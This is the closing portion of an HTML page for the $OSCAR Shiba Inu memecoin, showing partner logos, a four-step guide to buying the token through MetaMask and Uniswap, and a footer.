                            <div id="w-node-_8488a86d-a5dd-2c8a-f06c-a46272edd671-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://k9rescue.international/" target="_blank" class="w-inline-block"><img src="674a0e5023d2d0c4ac570f9e_K9%20Partner.webp" loading="lazy" sizes="(max-width: 479px) 42vw, (max-width: 767px) 26vw, (max-width: 991px) 28vw, (max-width: 1439px) 29vw, 406.6640625px" srcset="674a0e5023d2d0c4ac570f9e_K9%20Partner-p-500.webp 500w, 674a0e5023d2d0c4ac570f9e_K9%20Partner-p-800.webp 800w, 674a0e5023d2d0c4ac570f9e_K9%20Partner-p-1080.webp 1080w, 674a0e5023d2d0c4ac570f9e_K9%20Partner.webp 1542w" alt="" class="logo-small"></a></div>
                            <div id="w-node-_906f5c79-5609-32ce-dc33-75940aa27168-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://variety.org/" target="_blank" class="w-inline-block"><img src="674a0e51af65137d90b529d6_Variety%20Partner.webp" loading="lazy" sizes="(max-width: 479px) 42vw, (max-width: 767px) 26vw, (max-width: 991px) 28vw, (max-width: 1439px) 29vw, 406.6640625px" srcset="674a0e51af65137d90b529d6_Variety%20Partner-p-500.webp 500w, 674a0e51af65137d90b529d6_Variety%20Partner-p-800.webp 800w, 674a0e51af65137d90b529d6_Variety%20Partner-p-1080.webp 1080w, 674a0e51af65137d90b529d6_Variety%20Partner.webp 1542w" alt="" class="logo-small"></a></div>
                            <div id="w-node-e7f371bc-3e84-dee7-06b8-a1567efaccc5-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://x.com/oscar_shibainu/status/1847326489894695401" target="_blank" class="w-inline-block"><img src="674ac2023c52071cf9ccd6a6_Ellipal%20Partner.png" loading="lazy" sizes="(max-width: 479px) 42vw, (max-width: 767px) 26vw, (max-width: 991px) 28vw, (max-width: 1439px) 29vw, 406.6640625px" srcset="674ac2023c52071cf9ccd6a6_Ellipal%20Partner-p-500.png 500w, 674ac2023c52071cf9ccd6a6_Ellipal%20Partner-p-800.png 800w, 674ac2023c52071cf9ccd6a6_Ellipal%20Partner-p-1080.png 1080w, 674ac2023c52071cf9ccd6a6_Ellipal%20Partner.png 1542w" alt="" class="logo-small"></a></div>
                        </div>
                    </div>
                </div>
                <div class="w-layout-grid grid-6-col">
                    <div id="w-node-_0f99c55c-aef0-ebd9-f690-9830ff12bd1f-22318e3f" class="trusted-content trusted-list">
                        <div class="trusted-overlay-container"></div>
                        <div class="fade-in-on-scroll" style="opacity: 1;">
                            <h1 class="title smaller howtobuytitle">How to buy</h1>
                            <p class="paragraph-12 howtobuyyellow"><span class="text-span-3 boingtext">(psst.... boing)<br></span></p>
                            <div class="cards-second-grid third-row">
                                <div id="w-node-e5a666b5-f6bc-1ba2-a7ef-9d991c981861-22318e3f" data-w-id="e5a666b5-f6bc-1ba2-a7ef-9d991c981861" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background comingsooncard">
                                    <div class="card-container">
                                        <div class="card-image-holder"></div>
                                        <div class="card-text-holder">
                                            <div class="card-title black-text">1/ Create a wallet</div>
                                            <div class="experience-paragraph-holder">
                                                <p class="black-text">Download Metamask or your wallet of choice from the app store or google play store for free. Desktop users, download the google chrome extension by going to <a href="http://www.metamask.io/" target="_blank" class="link-3">metamask.io</a>.</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-e5a666b5-f6bc-1ba2-a7ef-9d991c98186b-22318e3f" data-w-id="e5a666b5-f6bc-1ba2-a7ef-9d991c98186b" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background comingsooncard">
                                    <div class="card-container">
                                        <div class="card-image-holder"></div>
                                        <div class="card-text-holder small">
                                            <div class="card-title black-text">2/ <strong class="bold-text-3">Get some ETH (Ethereum)</strong></div>
                                            <div class="experience-paragraph-holder">
                                                <p class="black-text">You can buy Ethereum (ETH) directly on MetaMask or transfer it to your MetaMask wallet from exchanges like Binance, Coinbase, ByBit, OKX, HTX, etc. Make sure to use the ERC-20 network when transferring ETH.</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-e5a666b5-f6bc-1ba2-a7ef-9d991c981875-22318e3f" data-w-id="e5a666b5-f6bc-1ba2-a7ef-9d991c981875" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background comingsooncard">
                                    <div class="card-container">
                                        <div class="card-image-holder"></div>
                                        <div class="card-text-holder small">
                                            <div class="card-title black-text"><strong class="bold-text-4">3/ Go to Uniswap</strong></div>
                                            <div class="experience-paragraph-holder">
                                                <p class="black-text">Go to <a href="http://app.uniswap.org/" target="_blank" class="link-2">app.uniswap.org</a> in google chrome or on the browser inside your Metamask app and proceed to connect your wallet. Always be careful connecting your wallet to malicious unathorized websites.</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div id="w-node-_946819c8-b882-1904-9638-00e121116328-22318e3f" data-w-id="946819c8-b882-1904-9638-00e121116328" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background comingsooncard">
                                    <div class="card-container">
                                        <div class="card-image-holder"></div>
                                        <div class="card-text-holder small">
                                            <div class="card-title black-text"><strong class="bold-text-4">4/ Swap&nbsp;ETH for $OSCAR</strong></div>
                                            <div class="experience-paragraph-holder">
                                                <p class="black-text">Select ETH in "from" field and choose $OSCAR in "to" field using our contract address. Enter the amount of tokens you want &amp; press swap. We have 0 taxes so don’t need to worry about buying with a specific slippage.</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="fade-in-on-scroll" style="opacity: 1;"><a href="https://app.uniswap.org/explore/tokens/ethereum/0xebb66a88cedd12bfe3a289df6dfee377f2963f12" target="_blank" class="button navbar-button howtobuybutton w-button">Buy Now</a></div>
                        <div class="fade-in-on-scroll" style="opacity: 1;"></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="footer">
        <div class="text-block-6 footerquote">"Decentralization, it works" - Ryoshi</div>
        <div class="container">
            <div class="footer-flex-container">
                <div class="footer-brand-content"><a href="" data-w-id="a91eae88-2cd2-a6a2-03b1-a73f4b02afe9" aria-current="page" class="footer-logo-link w-inline-block w--current" style="opacity: 1;"><img src="6720f21b8dae0c5d4b6837d0_oscar-face.png" sizes="48px" srcset="6720f21b8dae0c5d4b6837d0_oscar-face-p-500.png 500w, 6720f21b8dae0c5d4b6837d0_oscar-face.png 504w" alt="" class="footer-image"></a></div>
                <div data-w-id="a91eae88-2cd2-a6a2-03b1-a73f4b02b005" class="footer-copyright" style="opacity: 1;">
                    <div class="text-block-6">$oscar ©2024</div>
                </div>
            </div>
        </div>
    </div><a href="https://webflow.com/templates/html/black-app-website-template" target="_blank" class="buy-template-guide w-inline-block"></a>
</body>

</html>